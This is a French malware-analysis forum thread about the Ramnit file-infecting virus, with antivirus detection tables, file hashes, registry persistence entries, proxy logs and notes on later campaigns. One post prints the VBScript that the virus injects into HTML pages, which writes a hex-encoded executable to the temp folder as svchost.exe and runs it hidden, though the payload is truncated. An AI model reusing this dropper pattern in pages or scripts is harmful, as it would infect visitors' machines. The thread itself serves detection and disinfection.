Ramnit.A / W32/Cosmu.A / Win32:Quolko : Virus
-
Malekal_morte
- Site Admin
- Messages : 94301
- Inscription : 10 sept. 2005 13:57
- Contact :
Ramnit.A / W32/Cosmu.A / Win32:Quolko : Virus
Pour la désinfection, se reporter à cette page : https://www.malekal.com/2011/10/12/ramni ... rai-virus/
Ramnit.A (première version) est un virus au sens stricte du terme, c'est à dire qu'il infecte les fichiers exécutables.
Ramnit.A infecte les fichiers .EXE / .DLL et .HTML
Ce dernier semble moins virulant que son confrère : Virut / Virtob / Vitro.
La détection de la variante que je possède est excellente, voici les noms des détections des divers antivirus :
Le code ajouté aux fichiers HTML :
La détection d'une page WEB infectée :
Les lignes suivantes ont été ajoutés sur HijackThis :
et lance des requêtes sur Google :
Dans mon cas aucune connexion sur aucun C&C
En deux minutes, la machine infectée a perdu 150 Mo d'espace disque.
Et bien plus par la suite.
Dr Web CureIT (pas essayé avec Kaspersky) semble être capable de nettoyer les fichiers infectés.
fichier infecté par Ramnit.A
On voit donc que la taille de l'exe infecté a doublé, ce qui explique la perte d'espace disque.
Désinfection
Se reporter à cette page : https://www.malekal.com/2011/10/12/ramni ... rai-virus/
Ramnit.A (première version) est un virus au sens stricte du terme, c'est à dire qu'il infecte les fichiers exécutables.
Ramnit.A infecte les fichiers .EXE / .DLL et .HTML
Ce dernier semble moins virulant que son confrère : Virut / Virtob / Vitro.
La détection de la variante que je possède est excellente, voici les noms des détections des divers antivirus :
File name: uploaded_data
Submission date: 2010-08-03 10:12:24 (UTC)
Current status: finished
Result: 30 /42 (71.4%)
VT Community
Compact Print results
Antivirus Version Last Update Result
AhnLab-V3 2010.08.03.00 2010.08.03 Virus/Win32.Ramnit
AntiVir 8.2.4.32 2010.08.03 W32/Infector.Gen2
Antiy-AVL 2.0.3.7 2010.08.02 -
Authentium 5.2.0.5 2010.08.03 -
Avast 4.8.1351.0 2010.08.02 Win32:Quolko
Avast5 5.0.332.0 2010.08.02 Win32:Quolko
AVG 9.0.0.851 2010.08.03 Win32/Zbot.A
BitDefender 7.2 2010.08.03 Dropped:Backdoor.Bot.125603
CAT-QuickHeal 11.00 2010.08.03 W32.Ramnit.A
ClamAV 0.96.0.3-git 2010.08.03 -
Comodo 5628 2010.08.03 TrojWare.Win32.Trojan.Agent.~UL
DrWeb 5.0.2.03300 2010.08.03 Win32.Rmnet
Emsisoft 5.0.0.34 2010.07.30 Riskware.AdWare.Win32.Virtumonde!IK
eSafe 7.0.17.0 2010.08.02 -
eTrust-Vet 36.1.7757 2010.08.02 Win32/Ramnit.A
F-Prot 4.6.1.107 2010.08.03 W32/Ircnite.A.gen!Eldorado
F-Secure 9.0.15370.0 2010.08.03 Dropped:Backdoor.Bot.125603
Fortinet 4.1.143.0 2010.08.02 -
GData 21 2010.08.03 Dropped:Backdoor.Bot.125603
Ikarus T3.1.1.84.0 2010.08.03 not-a-virus:AdWare.Win32.Virtumonde
Jiangmin 13.0.900 2010.08.03 -
Kaspersky 7.0.0.125 2010.08.03 Type_Win32
McAfee 5.400.0.1158 2010.08.03 W32/Ramnit.a
McAfee-GW-Edition 2010.1 2010.08.02 Heuristic.LooksLike.Win32.SuspiciousPE.J
Microsoft 1.6004 2010.08.03 Virus:Win32/Ramnit.A
NOD32 5335 2010.08.02 Win32/Ramnit.A
Norman 6.05.11 2010.08.02 W32/Ramnit.A
nProtect 2010-08-02.02 2010.08.02 Dropped:Backdoor.Bot.125603
Panda 10.0.2.7 2010.08.02 W32/Cosmu.A
PCTools 7.0.3.5 2010.08.03 -
Prevx 3.0 2010.08.03 -
Rising 22.59.01.03 2010.08.03 Win32.Ramnit.a
Sophos 4.56.0 2010.08.03 W32/Patched-I
Sunbelt 6677 2010.08.03 Trojan.Win32.Generic!BT
SUPERAntiSpyware 4.40.0.1006 2010.08.03 -
Symantec 20101.1.1.7 2010.08.03 -
TheHacker 6.5.2.1.329 2010.08.03 -
TrendMicro 9.120.0.1004 2010.08.03 PE_RAMNIT.A
TrendMicro-HouseCall 9.120.0.1004 2010.08.03 PE_RAMNIT.A
VBA32 3.12.12.7 2010.08.02 Backdoor.IRCNite.pl
ViRobot 2010.8.3.3968 2010.08.03 -
VirusBuster 5.0.27.0 2010.08.02 Win32.Ramnit.Gen
Additional informationShow all
MD5 : 834fee3ade17da25749e190551321d92
SHA1 : 4f7378a963b849ba215f38ec15e76a0f9d631711
SHA256: ded3dae323a909c4752fa135de72cdc00ce0da3d1a5fd715fe536105a4da8cac
Le code ajouté aux fichiers HTML :
Code : Tout sélectionner
DropFileName = "svchost.exe"
WriteData = "4D5A90000300000004000000FFFF0000B8000000000000004000000000000000000000000000000000000000000000000000000000000000000000001[removed]"
Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0
//--></SCRIPT>La détection d'une page WEB infectée :
File name: Accueil malekal_com.htm
Submission date: 2010-11-07 18:32:48 (UTC)
Current status: queued queued analysing finished
Result: 30/ 43 (69.8%)
Compact Print results
Antivirus Version Last Update Result
AhnLab-V3 2010.11.06.01 2010.11.06 -
AntiVir 7.10.13.164 2010.11.07 HTML/Rce.Gen
Antiy-AVL 2.0.3.7 2010.11.07 -
Authentium 5.2.0.5 2010.11.07 VBS/Inor.DZ
Avast 4.8.1351.0 2010.11.07 VBS:ExeDropper-gen
Avast5 5.0.594.0 2010.11.07 VBS:ExeDropper-gen
AVG 9.0.0.851 2010.11.07 VBS/Generic
BitDefender 7.2 2010.11.07 Win32.Ramnit.C
CAT-QuickHeal 11.00 2010.11.04 -
ClamAV 0.96.2.0-git 2010.11.06 PUA.HTML.Infected.WebPage-2
Comodo 6643 2010.11.07 -
DrWeb 5.0.2.03300 2010.11.07 Trojan.Inor
Emsisoft 5.0.0.50 2010.11.07 HTML.Rce!IK
eSafe 7.0.17.0 2010.11.07 VBS.Redlof.i
eTrust-Vet 36.1.7958 2010.11.05 HTML/Ramnit!generic
F-Prot 4.6.2.117 2010.11.07 VBS/Inor.DZ
F-Secure 9.0.16160.0 2010.11.07 Win32.Ramnit.C
Fortinet 4.2.249.0 2010.11.07 VBS/Dropper.DL!tr
GData 21 2010.11.07 Win32.Ramnit.C
Ikarus T3.1.1.90.0 2010.11.07 HTML.Rce
Jiangmin 13.0.900 2010.11.07 -
K7AntiVirus 9.67.2903 2010.11.03 Trojan
Kaspersky 7.0.0.125 2010.11.07 Trojan-Dropper.VBS.Exe2Vbs.b
McAfee 5.400.0.1158 2010.11.07 W32/Ramnit.a!htm
McAfee-GW-Edition 2010.1C 2010.11.07 -
Microsoft 1.6301 2010.11.07 Virus:VBS/Ramnit.B
NOD32 5598 2010.11.07 Win32/Ramnit.A
Norman 6.06.10 2010.11.07 HTML/Ramnit.A
nProtect 2010-11-07.01 2010.11.07 -
Panda 10.0.2.7 2010.11.07 W32/Cosmu.A
PCTools 7.0.3.5 2010.11.07 Malware.Ramnit
Prevx 3.0 2010.11.07 -
Rising 22.72.04.00 2010.11.06 Dropper.Script.VBS.Fednu.a
Sophos 4.59.0 2010.11.07 VBS/Inor-AA
Sunbelt 7243 2010.11.07 Trojan.VBS.Ramnit (v)
SUPERAntiSpyware 4.40.0.1006 2010.11.07 -
Symantec 20101.2.0.161 2010.11.07 W32.Ramnit!html
TheHacker 6.7.0.1.079 2010.11.07 -
TrendMicro 9.120.0.1004 2010.11.07 HTML_RAMNIT.AL
TrendMicro-HouseCall 9.120.0.1004 2010.11.07 HTML_RAMNIT.AL
VBA32 3.12.14.1 2010.11.05 -
ViRobot 2010.10.4.4074 2010.11.07 -
VirusBuster 12.72.1.1 2010.11.07 -
Additional informationShow all
MD5 : 1f416d12ee00b2500e10a2eaa75a8475
SHA1 : 2984fbacb71d28eb921036753acd85bbd1741b00
SHA256: 68e232daf8c6f9ccf932eb3d840dacaa6a2410c614ecaaa9da8d82e11bf8db3c
Les lignes suivantes ont été ajoutés sur HijackThis :
Le malware lance une instance d'Internet Explorer en backgroundR1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyServer = http=127.0.0.1:8888;https=127.0.0.1:8888;
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName = Liens
F2 - REG:system.ini: UserInit=c:\windows\system32\userinit.exe,,c:\program files\microsoft\desktoplayer.exe
et lance des requêtes sur Google :
Code : Tout sélectionner
1289153890.751 375 192.168.1.92 TCP_MISS/200 478 GET http://www.google-analytics.com/__utm.gif?utmwv=4.8.6&utmn=1517515671&utmhn=ads.clicksor.com&utmcs=utf-8&utmsr=1096x838&utmsc=16-bit&utmul=en-us&utmje=1&utmfl=10.0%20r22&utmhid=862729793&utmr=http%3A%2F%2Fwww.trendsone.com%2F&utmp=%2FnewServing%2FsearchTrack.php%3Fnid%3D1037%26random%3D26074&utmac=UA-453142-35&utmcc=__utma%3D251001561.2006186915.1289136613.1289148018.1289153318.6%3B%2B__utmz%3D251001561.1289153318.6.6.utmcsr%3Dtrendsone.com%7Cutmccn%3D(referral)%7Cutmcmd%3Dreferral%7Cutmcct%3D%2F%3B&utmu=DB - DIRECT/74.125.43.139 image/gif
1289153938.388 272 192.168.1.92 TCP_MISS/200 478 GET http://www.google-analytics.com/__utm.gif?utmwv=4.8.6&utmn=900480859&utmhn=tu.tv&utmcs=iso-8859-1&utmsr=1096x838&utmsc=16-bit&utmul=en-us&utmje=1&utmfl=10.0%20r22&utmdt=Tu.tv%20-%20Tus%20videos%20en%20internet&utmhid=988635622&utmr=-&utmp=%2F&utmac=UA-642705-30&utmcc=__utma%3D111564033.670189319.1289144342.1289144342.1289153366.2%3B%2B__utmz%3D111564033.1289144342.1.1.utmcsr%3D(direct)%7Cutmccn%3D(direct)%7Cutmcmd%3D(none)%3B&utmu=q - DIRECT/74.125.43.139 image/gifEn deux minutes, la machine infectée a perdu 150 Mo d'espace disque.
Et bien plus par la suite.
Dr Web CureIT (pas essayé avec Kaspersky) semble être capable de nettoyer les fichiers infectés.
fichier infecté par Ramnit.A
fichier désinfecté :malekalmorte@MaK-tux:/tmp$ ls -l mbr_Ramnit.exe
-rw-r--r-- 1 malekalmorte malekalmorte 124416 7 nov. 12:57 mbr_Ramnit.exe
C'est bien la taille origaine de mbr.exe et surtout le fichier n'est pas corrompu est utilisable.C:\Documents and Settings\Mak>dir Bureau\mbr_Ramnit.exe
Le volume dans le lecteur C n'a pas de nom.
Le numéro de série du volume est 4063-B68D
Répertoire de C:\Documents and Settings\Mak\Bureau
07/11/2010 12:57 77 312 mbr_Ramnit.exe
1 fichier(s) 77 312 octets
0 Rép(s) 5 289 340 928 octets libres
On voit donc que la taille de l'exe infecté a doublé, ce qui explique la perte d'espace disque.
Désinfection
Se reporter à cette page : https://www.malekal.com/2011/10/12/ramni ... rai-virus/
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas
Sécuriser son ordinateur (version courte)
Tutoriels Logiciels - Tutoriel Windows - Windows 10
Stop publicités - popups intempestives
supprimer-trojan.com : guide de suppression de malwares
Partagez malekal.com : n'hésitez pas à partager sur Facebook et GooglePlus les articles qui vous plaisent.
Sécuriser son ordinateur (version courte)
Tutoriels Logiciels - Tutoriel Windows - Windows 10
Stop publicités - popups intempestives
supprimer-trojan.com : guide de suppression de malwares
Partagez malekal.com : n'hésitez pas à partager sur Facebook et GooglePlus les articles qui vous plaisent.
-
Malekal_morte
- Site Admin
- Messages : 94301
- Inscription : 10 sept. 2005 13:57
- Contact :
Re: Ramnit.A / W32/Cosmu.A / Win32:Quolko : Virus
Nouveau fichier droppé à la place de c:\program files\microsoft\desktoplayer.exe qui est maintenant c:\program files\microsoft\watermark.exe
La détection d'un fichier infecté est correcte :
La détection du dropper :Process:
Path: C:\WINDOWS\system32\svchost.exe
PID: 2512
Information: Generic Host Process for Win32 Services (Microsoft Corporation)
Registry Group: Winlogon
Object:
Registry key: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
Registry value: Userinit
New value:
Type: REG_SZ
Value: c:\windows\system32\userinit.exe,,c:\program files\microsoft\watermark.exe
Previous value:
Type: REG_SZ
Value: C:\WINDOWS\system32\userinit.exe,
File name: file-1564487_exe
Submission date: 2010-11-19 12:41:36 (UTC)
Current status: finished
Result: 8 /43 (18.6%)
Safety score: -
Compact
Print results
Antivirus Version Last Update Result
AhnLab-V3 2010.11.19.00 2010.11.18 -
AntiVir 7.10.14.39 2010.11.19 -
Antiy-AVL 2.0.3.7 2010.11.19 -
Avast 4.8.1351.0 2010.11.19 Win32:Rootkit-gen
Avast5 5.0.594.0 2010.11.19 Win32:Rootkit-gen
AVG 9.0.0.851 2010.11.19 unknown virus Win32/DH.CAFF820391
BitDefender 7.2 2010.11.19 -
CAT-QuickHeal 11.00 2010.11.09 -
ClamAV 0.96.4.0 2010.11.19 -
Command 5.2.11.5 2010.11.19 -
Comodo 6771 2010.11.19 Heur.Suspicious
DrWeb 5.0.2.03300 2010.11.19 -
Emsisoft 5.0.0.50 2010.11.19 -
eSafe 7.0.17.0 2010.11.18 -
eTrust-Vet 36.1.7986 2010.11.19 -
F-Prot 4.6.2.117 2010.11.19 -
F-Secure 9.0.16160.0 2010.11.19 -
Fortinet 4.2.254.0 2010.11.18 -
GData 21 2010.11.19 Win32:Rootkit-gen
Ikarus T3.1.1.90.0 2010.11.19 -
Jiangmin 13.0.900 2010.11.19 -
K7AntiVirus 9.68.3021 2010.11.18 -
Kaspersky 7.0.0.125 2010.11.19 -
McAfee 5.400.0.1158 2010.11.19 Artemis!2A24E9DB1AE2
McAfee-GW-Edition 2010.1C 2010.11.19 Artemis!2A24E9DB1AE2
Microsoft 1.6402 2010.11.19 Trojan:Win32/Ramnit.A
NOD32 5633 2010.11.19 -
Norman 6.06.10 2010.11.19 -
nProtect 2010-11-19.02 2010.11.19 -
Panda 10.0.2.7 2010.11.18 -
PCTools 7.0.3.5 2010.11.19 -
Prevx 3.0 2010.11.19 -
Rising 22.74.03.08 2010.11.19 -
Sophos 4.59.0 2010.11.19 -
SUPERAntiSpyware 4.40.0.1006 2010.11.19 -
Symantec 20101.2.0.161 2010.11.19 -
TheHacker 6.7.0.1.086 2010.11.18 -
TrendMicro 9.120.0.1004 2010.11.19 -
TrendMicro-HouseCall 9.120.0.1004 2010.11.19 -
VBA32 3.12.14.2 2010.11.18 -
VIPRE 7350 2010.11.19 -
ViRobot 2010.11.19.4157 2010.11.19 -
VirusBuster 13.6.48.0 2010.11.18 -
Additional information
Show all
MD5 : 2a24e9db1ae2a14e0a861a05c15701f8
SHA1 : cbbc338e1c62a47ff91a3477b0e7e82b3b5babb7
SHA256: 0d3ec268746e7fb5e00d90c483b488aafb44d489b12cdfeed83b65205662d5d1
La détection d'un fichier infecté est correcte :
Merci angelique.File name:
mbr.exe
Submission date: 2010-11-19 12:47:02 (UTC)
Current status: queued (#8) queued (#6) analysing finished
Result: 30/ 43 (69.8%)
Safety score: -
Compact
Print results
Antivirus Version Last Update Result
AhnLab-V3 2010.11.19.00 2010.11.18 Win32/Ramnit
AntiVir 7.10.14.39 2010.11.19 W32/Ramnit.C
Antiy-AVL 2.0.3.7 2010.11.19 -
Avast 4.8.1351.0 2010.11.19 Win32:Ramnit-F
Avast5 5.0.594.0 2010.11.19 Win32:Ramnit-F
AVG 9.0.0.851 2010.11.19 Win32/Zbot.G
BitDefender 7.2 2010.11.19 Win32.Ramnit.H
CAT-QuickHeal 11.00 2010.11.09 -
ClamAV 0.96.4.0 2010.11.19 W32.Ramnit-1
Command 5.2.11.5 2010.11.19 W32/Ramnit.D
Comodo 6771 2010.11.19 Packed.Win32.MUPX.Gen
DrWeb 5.0.2.03300 2010.11.19 -
Emsisoft 5.0.0.50 2010.11.19 Virus.Win32.Ramnit!IK
eSafe 7.0.17.0 2010.11.18 -
eTrust-Vet 36.1.7986 2010.11.19 Win32/Ramnit.C
F-Prot 4.6.2.117 2010.11.19 W32/Ramnit.D
F-Secure 9.0.16160.0 2010.11.19 Win32.Ramnit.H
Fortinet 4.2.254.0 2010.11.18 -
GData 21 2010.11.19 Win32.Ramnit.H
Ikarus T3.1.1.90.0 2010.11.19 Virus.Win32.Ramnit
Jiangmin 13.0.900 2010.11.19 Backdoor/IRCNite.wi
K7AntiVirus 9.68.3021 2010.11.18 Virus
Kaspersky 7.0.0.125 2010.11.19 Virus.Win32.Nimnul.a
McAfee 5.400.0.1158 2010.11.19 W32/NGVCK
McAfee-GW-Edition 2010.1C 2010.11.19 W32/NGVCK
Microsoft 1.6402 2010.11.19 Virus:Win32/Ramnit.I
NOD32 5633 2010.11.19 Win32/Ramnit.H
Norman 6.06.10 2010.11.19 -
nProtect 2010-11-19.02 2010.11.19 Win32.Ramnit.H
Panda 10.0.2.7 2010.11.18 W32/Cosmu.C
PCTools 7.0.3.5 2010.11.19 Malware.Ramnit
Prevx 3.0 2010.11.19 -
Rising 22.74.03.08 2010.11.19 -
Sophos 4.59.0 2010.11.19 W32/Ramnit-A
SUPERAntiSpyware 4.40.0.1006 2010.11.19 -
Symantec 20101.2.0.161 2010.11.19 W32.Ramnit.B!inf
TheHacker 6.7.0.1.086 2010.11.18 -
TrendMicro 9.120.0.1004 2010.11.19 PAK_Generic.001
TrendMicro-HouseCall 9.120.0.1004 2010.11.19 -
VBA32 3.12.14.2 2010.11.18 -
VIPRE 7350 2010.11.19 Virus.Win32.Ramnit.b (v)
ViRobot 2010.11.19.4157 2010.11.19 -
VirusBuster 13.6.48.0 2010.11.18 Win32.Ramnit.Gen.2
Additional information
Show all
MD5 : fe52fb201260f9aa22070e78318e4c2a
SHA1 : a03071130db289af837a57b5187a9840cddcb3bd
SHA256: 5d3f7dede169e6c9b1e742cfb6901b452c6073b7e1cb88d8c4eb28e7286eb803
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas
Sécuriser son ordinateur (version courte)
Tutoriels Logiciels - Tutoriel Windows - Windows 10
Stop publicités - popups intempestives
supprimer-trojan.com : guide de suppression de malwares
Partagez malekal.com : n'hésitez pas à partager sur Facebook et GooglePlus les articles qui vous plaisent.
Sécuriser son ordinateur (version courte)
Tutoriels Logiciels - Tutoriel Windows - Windows 10
Stop publicités - popups intempestives
supprimer-trojan.com : guide de suppression de malwares
Partagez malekal.com : n'hésitez pas à partager sur Facebook et GooglePlus les articles qui vous plaisent.
-
Malekal_morte
- Site Admin
- Messages : 94301
- Inscription : 10 sept. 2005 13:57
- Contact :
Re: Ramnit.A / W32/Cosmu.A / Win32:Quolko : Virus
Retour de Ramnit sur les forums
Ce dernier ajoute les lignes aléatoires maintenant de ce type :
Exemple de détection :
Ce dernier ajoute les lignes aléatoires maintenant de ce type :
Les fichiers executables peuvent être endommagés, ce qui peux ouvrir une fenêtre type invite de commande NTVM.O4 - HKCU\..\Run: [MtyVqlxo] C:\Users\biotope\AppData\Local\enhjglox\mtyvqlxo.exe
O4 - Startup: mtyvqlxo.exe
Exemple de détection :
AhnLab-V3 2011.08.02.01 2011.08.02 Trojan/Win32.Lebag
AVG 10.0.0.1190 2011.08.02 SHeur3.CMFH
CAT-QuickHeal 11.00 2011.08.02 (Suspicious) - DNAScan
DrWeb 5.0.2.03300 2011.08.02 Trojan.DownLoader4.29266
Emsisoft 5.1.0.8 2011.08.02 Trojan.Win32.Agent2!IK
Ikarus T3.1.1.104.0 2011.08.02 Trojan.Win32.Agent2
Kaspersky 9.0.0.837 2011.08.02 Trojan.Win32.Agent2.dszx
McAfee-GW-Edition 2010.1D 2011.08.02 Heuristic.LooksLike.Win32.Suspicious.J
Microsoft 1.7104 2011.08.02 Trojan:Win32/Ramnit
Panda 10.0.3.5 2011.08.02 Trj/CI.A
Sophos 4.67.0 2011.08.02 Troj/Agent-SQJ
SUPERAntiSpyware 4.40.0.1006 2011.08.02 Trojan.Agent/Gen-Mixel
TrendMicro 9.200.0.1012 2011.08.02 PAK_Generic.001
TrendMicro-HouseCall 9.200.0.1012 2011.08.02 PAK_Generic.001
VIPRE 10044 2011.08.02 FraudTool.Win32.Krap.ek!b (v)
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas
Sécuriser son ordinateur (version courte)
Tutoriels Logiciels - Tutoriel Windows - Windows 10
Stop publicités - popups intempestives
supprimer-trojan.com : guide de suppression de malwares
Partagez malekal.com : n'hésitez pas à partager sur Facebook et GooglePlus les articles qui vous plaisent.
Sécuriser son ordinateur (version courte)
Tutoriels Logiciels - Tutoriel Windows - Windows 10
Stop publicités - popups intempestives
supprimer-trojan.com : guide de suppression de malwares
Partagez malekal.com : n'hésitez pas à partager sur Facebook et GooglePlus les articles qui vous plaisent.
-
Malekal_morte
- Site Admin
- Messages : 94301
- Inscription : 10 sept. 2005 13:57
- Contact :
Re: Ramnit.A / W32/Cosmu.A / Win32:Quolko : Virus
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas
Sécuriser son ordinateur (version courte)
Tutoriels Logiciels - Tutoriel Windows - Windows 10
Stop publicités - popups intempestives
supprimer-trojan.com : guide de suppression de malwares
Partagez malekal.com : n'hésitez pas à partager sur Facebook et GooglePlus les articles qui vous plaisent.
Sécuriser son ordinateur (version courte)
Tutoriels Logiciels - Tutoriel Windows - Windows 10
Stop publicités - popups intempestives
supprimer-trojan.com : guide de suppression de malwares
Partagez malekal.com : n'hésitez pas à partager sur Facebook et GooglePlus les articles qui vous plaisent.
-
Malekal_morte
- Site Admin
- Messages : 94301
- Inscription : 10 sept. 2005 13:57
- Contact :
Re: Ramnit.A / W32/Cosmu.A / Win32:Quolko : Virus
D'après CheckPoint, une nouvelle campagne de Ramnit aurait lieu et la France serait touché.
Ce botnet utilise les fonctions suivants :
Ce dernier fonctionne en injectant des processus systèmes l'un après l'autre en commençant par msiexec.exe puis en terminant par svchost.exe
- Campagne du virus Ramnit
- Beaucoup de samples avec des domaines différents au lieu de l'utilisation de DGA
- Le C&C n'ajoute pas de module supplémentaires comme les modules VNC, vol de mot de passe, FtpGrabber
- Des modules comme FTPServer, WebInjectssont empactés dans Ramnit
- Mais surtout Ramnit est utilisé pour pousser un autre malware : Ngioweb
- Ngioweb permet de transformer l'ordinateur de la victime en Proxy
- Ngioweb permet de transformer l'ordinateur de la victime en Proxy
- Pièces jointes
-
- Ngioweb et les injections de processus systèmes
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas
Sécuriser son ordinateur (version courte)
Tutoriels Logiciels - Tutoriel Windows - Windows 10
Stop publicités - popups intempestives
supprimer-trojan.com : guide de suppression de malwares
Partagez malekal.com : n'hésitez pas à partager sur Facebook et GooglePlus les articles qui vous plaisent.
Sécuriser son ordinateur (version courte)
Tutoriels Logiciels - Tutoriel Windows - Windows 10
Stop publicités - popups intempestives
supprimer-trojan.com : guide de suppression de malwares
Partagez malekal.com : n'hésitez pas à partager sur Facebook et GooglePlus les articles qui vous plaisent.